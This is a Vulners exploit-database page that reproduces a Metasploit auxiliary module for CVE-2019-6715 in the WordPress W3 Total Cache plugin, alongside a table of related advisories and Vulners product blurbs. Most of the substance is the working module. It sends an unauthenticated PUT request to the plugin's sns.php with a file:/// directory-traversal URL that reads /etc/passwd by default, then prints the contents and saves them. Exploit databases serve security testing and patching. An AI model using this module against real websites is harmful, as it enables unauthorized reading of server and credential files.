Vulners
Lucene search
WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit)
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | Exploit for CVE-2019-6715 | 12 Nov 201914:47 | – | githubexploit |
 | CVE-2019-6715 | 15 May 202309:53 | – | circl |
 | W3 Total Cache Arbitrary File Read Vulnerability | 2 Apr 201900:00 | – | cnvd |
 | WordPress W3 Total Cache Plugin Arbitrary File Read (CVE-2019-6715) | 17 Nov 201900:00 | – | checkpoint_advisories |
 | CVE-2019-6715 | 1 Apr 201919:05 | – | cve |
 | CVE-2019-6715 | 1 Apr 201919:05 | – | cvelist |
 | W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal | 3 Jun 202606:04 | – | nuclei |
 | CVE-2019-6715 | 1 Apr 201920:29 | – | nvd |
 | WordPress W3 Total Cache Plugin < 0.9.4 File Read Vulnerability | 9 May 201900:00 | – | openvas |
 | CVE-2019-6715 | 1 Apr 201920:29 | – | osv |
10
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
#
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HTTP::Wordpress
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress W3 Total Cache File Read Vulnerability',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
in WordPress plugin
'W3 Total Cache' version 0.9.2.6-0.9.3, allowing arbitrary file read with
the web server privileges.
},
'References' =>
[
['CVE', '2019-6715'],
['WPVDB', '9248'],
['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2019-6715'],
['URL','https://vinhjaxt.github.io/2019/03/cve-2019-6715'],
],
'Author' =>
[
'VinhJAXT', # Vulnerability discovery
'Hoa Nguyen - SunCSR Team' # Metasploit module
],
'DisclosureDate' => '2014-09-20',
'License' => MSF_LICENSE
)
)
register_options(
[
OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
OptInt.new('DEPTH', [true, 'Traversal Depth (to reach the root folder)', 2])
]
)
end
def check
check_plugin_version_from_readme('w3-total-cache', '0.9.4', '0.9.26')
end
def run_host(ip)
traversal = '../' * datastore['DEPTH']
filename = datastore['FILEPATH']
filename = filename[1, filename.length] if filename =~ %r{^/}
json_body = { 'Type' => "SubscriptionConfirmation",
'Message' => '',
'SubscribeURL' => "file:///#{traversal}#{filename}"
}
res = send_request_cgi({
'method' => 'PUT',
'uri' => normalize_uri(wordpress_url_plugins, 'w3-total-cache', 'pub','sns.php'),
'ctype' => 'application/json',
'data' => JSON.generate(json_body)
})
fail_with Failure::Unreachable, 'Connection failed' unless res
fail_with Failure::NotVulnerable, 'Connection failed. Nothing was downloaded' unless res.code == 200
fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero?
print_status('Downloading file...')
print_line("\n#{res.body}\n")
fname = datastore['FILEPATH']
path = store_loot(
'w3_total_cache.traversal',
'text/plain',
ip,
res.body,
fname
)
print_good("File saved in: #{path}")
end
endData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Dec 2020 00:00Current
7.6High risk
Vulners AI Score7.6
CVSS 25
CVSS 3.17.5
EPSS0.91502